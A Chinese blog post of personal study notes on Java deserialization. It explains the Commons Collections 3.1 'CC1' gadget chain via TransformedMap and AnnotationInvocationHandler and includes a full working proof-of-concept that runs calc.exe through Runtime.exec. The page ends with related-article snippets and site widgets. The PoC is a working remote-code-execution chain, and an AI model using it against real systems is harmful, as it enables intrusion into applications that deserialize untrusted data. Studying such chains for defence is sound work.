Java安全学习笔记--反序列化漏洞利用链CC1链(2)

已于 2022-01-18 18:50:51 修改
阅读量573 收藏 1
点赞数
分类专栏: Java安全 文章标签: java 安全 信息安全 网络安全 web安全
于 2022-01-17 18:52:19 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64685672/article/details/122545618
版权

测试环境

jdk1.7(jdk7u80)

Commons Collections3.1

TransformedMap

transfomedMap利用相对没那么繁琐,首先找到transformedMap类中调用transform()方法的地方,总共有三处,poc中利用的是这一处

protected Object checkSetValue(Object value) {
    return this.valueTransformer.transform(value);
}

结合AnotationinvocationHandler的readobject()方法来看,这里的var5是可控的可以通过反射的方式将transfomedMap赋值给this.memberValues,之后获取transformedMap的迭代器(iterator()),TransformedMap没有过重写这个方法,这时实际是获取的它的父类transformedMap的迭代器

setValue调用的是transformedMap的父类中的setValue方法,父类中的setValue会调用checkSetValue触发核心利用链。

public Object setValue(Object value) {
    value = this.parent.checkSetValue(value);
    return super.entry.setValue(value);
}

父类中的this.parent是怎么变成transformedMap的?

Readobject():

Iterator var4 = this.memberValues.entrySet().iterator();

transformedMap会调用父类的entrySet()把自己传入赋值给this.parent:

编写POC

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.InvocationTargetException;
import java.util.HashMap;
import java.util.Map;

public class transformedPoc {
    public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, IllegalAccessException, InvocationTargetException, InstantiationException, IOException {
        Transformer[] transforms = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", new Class[0]}),
                new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[0]}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc.exe"}),
        };
        Transformer chainTransformer = new ChainedTransformer(transforms);
        Map map = new HashMap();
        map.put("value", "suibian");
        //map中的key值必须为value是为了符合readObject中的if(var7!=null)的条件
        Map transformedMap = TransformedMap.decorate(map, null, chainTransformer);
        Class classInstance = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor constructor = classInstance.getDeclaredConstructor(Class.class, Map.class);
        constructor.setAccessible(true);
        InvocationHandler annotationInvocationHandler = (InvocationHandler) constructor.newInstance(Target.class, transformedMap);
        //序列化
        ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
        ObjectOutputStream outputStream = new ObjectOutputStream(byteArrayOutputStream);
        outputStream.writeObject(annotationInvocationHandler);
        //反序列化
        ByteArrayInputStream byteArrayInputStream = new ByteArrayInputStream(byteArrayOutputStream.toByteArray());
        ObjectInputStream inputStream = new ObjectInputStream(byteArrayInputStream);
        inputStream.readObject();
    }
}

Poc中的map为什么要添加一对键值对值为{“value”,”suibian”}?

Key值必须为value因为readObject中要符合if(var7!=null)这个条件才能运行到var5.setValue这行代码,通过调试var3为Target中的方法,Target中只有一个方法value(),var6获取的是map的key值“value”,这样Class var7=(Class)var3.get(var6),var7就不为空且符合下一个if的判断。

m0v0
关注
专栏目录
Java安全(七) CC1
WDWAGAAFGAGDADSA的博客
12-24 2353
Commons Collections 1的基本知识
网络安全反序列化漏洞分析
lzhy666的博客
06-10 3273
FastJson 是 alibaba 的一款开源 JSON 解析库,可用于将 Java 对象转换为其 JSON 表示形式,也可以用于将 JSON 字符串转换为等效的 Java 对象分别通过toJSONString和parseObject/parse来实现序列化和反序列化
Java反序列化漏洞实现
weixin_34393428的博客
10-22 292
一、说明 以前去面试被问反序列化的原理只是笼统地答在参数中注入一些代码当其反序列化时被执行,其实“一些代码”是什么代码“反序列化”时为什么就会被执行并不懂;反来在运营商做乙方经常会因为java反序列化漏洞要升级commons.collections或给中间件打补丁,前面说的两个问题还是不懂;今天又研究了番,也还不是很懂只是能弹计算器暂且先记一下。   二、序列化和反序列化 序列化和反序列化应该是...
Javaweb安全——反序列化漏洞- CC1
weixin_43610673的博客
05-24 1205
Common-Collections利用1 第一次接触反序列化漏洞时写的初识Java反序列化漏洞这篇文章当中已经分析过一遍Common-Collections的两条子(分别用的TransformedMap和LazyMap构造恶意对象反射,AnnotationInvocationHandler(CC1)和BadAttributeValueExpException(CC5)调用transform())。这次从Common-Collections1开始再捋一遍,顺便自己写一遍exp加深印象。 本文环境为jd
Java代码审计-CC1 Chains
Love&Share
01-14 1409
有关环境配置和IDEA调试可以看上一篇文章,电梯 分析 Java集合框架 Java集合框架是对多个数据进行存储操作的结构,其主要分为Collection和Map两种体系: Collection接口:单例数据,定义了存取一组对象的方法的集合 Map接口:双列数据,保存具有映射关系“Key-value”的集合 Apache Commons Collections:一个扩展了Java标准库里集合框架的第三方基础库。它包含有很多 jar 工具包,提供了很多强有力的数据结构类型并且实现了各种集合工具类 先来看通过.
Javaweb安全——反序列化漏洞-CC3
weixin_43610673的博客
07-06 989
CommonsCollections3是为了绕过一些规则对InvokerTransformer的限制而产生的,因为在CommonsCollections1中我们为了动态调用方法需要使InvokerTransformer这个类完成回调,被加入黑名单的话就切断了CommonsCollections1的利用。上一篇文章的TemplatesImpl动态加载字节码刚好就有用武之地了,将原来的回调替换掉变成直接加载字节码。先来看一个demo: 由CommonsCollections1 AnnotationInvoc
Java 反序列化漏洞
qq_61553520的博客
05-24 5212
在各种编程语言的反序列化漏洞中,Java是最引人瞩目的,因为Java的开发生态中各种第三方库组件相互依赖,经常出现开发中常用的基础底层组件出现安全问题时,会引发核弹式反应,进而影响到上层得操作系统。
红队系列-网络安全知识锦囊(持续更新)
最新发布
aming小老弟
11-09 1010
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
Java安全反序列化回显与内存码,java核心编程视频教学
m0_64384302的博客
12-12 257
org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null)); Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclared
网络安全专业名词解释
aixmmmlll的博客
05-16 3901
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令与控制,常见于APT攻击场景中。作动词解释时理解为恶意软件与攻击者进行交互
java反序列化漏洞分析
weixin_47623655的博客
03-30 2397
Java反序列化漏洞Java Deserialization Vulnerabilities)是一种常见的安全漏洞,其攻击方式是利用Java中的序列化和反序列化机制,通过在序列化数据中插入恶意代码,导致反序列化过程中执行恶意代码。Java反序列化漏洞是由于Java序列化机制本身的缺陷导致的。为了防止恶意序列化数据被反序列化,可以在程序中对未知的序列化数据进行拒绝,或者对序列化数据进行白名单或黑名单的过滤。Java反序列化漏洞的攻击方式主要有两种:基于本地文件的反序列化攻击和基于网络的反序列化攻击。
Java安全学习笔记--反序列化利用CC1(1)
m0_64685672的博客
01-16 1068
测试环境 jdk1.7(jdk7u80) CommonCellection3.1 预备知识简述 反射 每个类在第一次创建时会生成一个class实例,这个class实例保存着类的所有信息,可以通过: public Field[] getFields(); //返回类的成员方法 public Method[] getMethods(); //返回类的构造方法 public Constructor<T> getConstructor(Class<?>... para
6-java安全——java反序列化漏洞利用
网络安全
07-01 4176
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞学习如何构造利用。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类中重写ObjectInputSt
7-java安全——java反序列化CC1分析
网络安全
07-04 3735
apache commons-collections组件反序列化漏洞的反射也称为CC,自从apache commons-collections组件爆出java第一个反序列化漏洞后,就像打开了新世界大门一样,之后很多java中间件也相继爆出反序列化漏洞。例如比较常用的反序列化漏洞利用工具ysoserial就使用了LazyMap类的利用,本文将继续学习LazyMap类的利用。 ...
15.1 ByteArrayInputStream(字节数组输入流)和ByteArrayOutputStream类(字节数组输出流)
KiGang的博客
11-13 3185
字节数组流对象字节数组流对象分为输入流和输出流。分别是:ByteArrayInputStreamByteArrayOutputStream。ByteArrayInputStream类字节数组输入流在内存创建一个字节数组缓冲区,从输入流读取的数据保存在该字节数组缓冲区中。创建字节数组输入流对象有以下方式://方法 1 ByteArrayInputStream bArray = new ByteArr
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4340
cc1(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
Java反序列化CC1调用poc
m0_61572518的博客
04-24 2068
package demo3.cc1; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.In.
Java安全学习笔记--反序列化漏洞利用CC2
m0_64685672的博客
01-18 1090
测试环境 jdk1.8(jdk8u71) apache common cellection 4.0 预备知识简述 Javassist动态字节码编程 字节码技术可以动态改变某个类的结构(添加/删除/修改新的属性/方法) 关于字节码的框架有javassist,asm,bcel等,javassist相对简单不需要掌握字节码指令相关知识即可使用。 几个关键的类: ClassPool:ClassPool 类可以控制的类的字节码,例如创建一个类或加载一个类,是CtClass对象集合的容器。一旦C..
java反序列化漏洞利用工具_Java 反序列化漏洞
weixin_39588432的博客
12-02 667
序列化和反序列化序列化:将对象转换成字节序列存储(文件、内存、数据库),对应 Java 原生序列化的 writeObject反序列化:将字节序列转换成对象,对应 Java 原生序列化的 readObject序列化作用不同系统、进程间的数据传输(RPC、HTTP )Java RMI、Java Bean保存信息,便于 JVM 启动时直接使用序列化条件该类必须实现 java.io.Serializabl...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值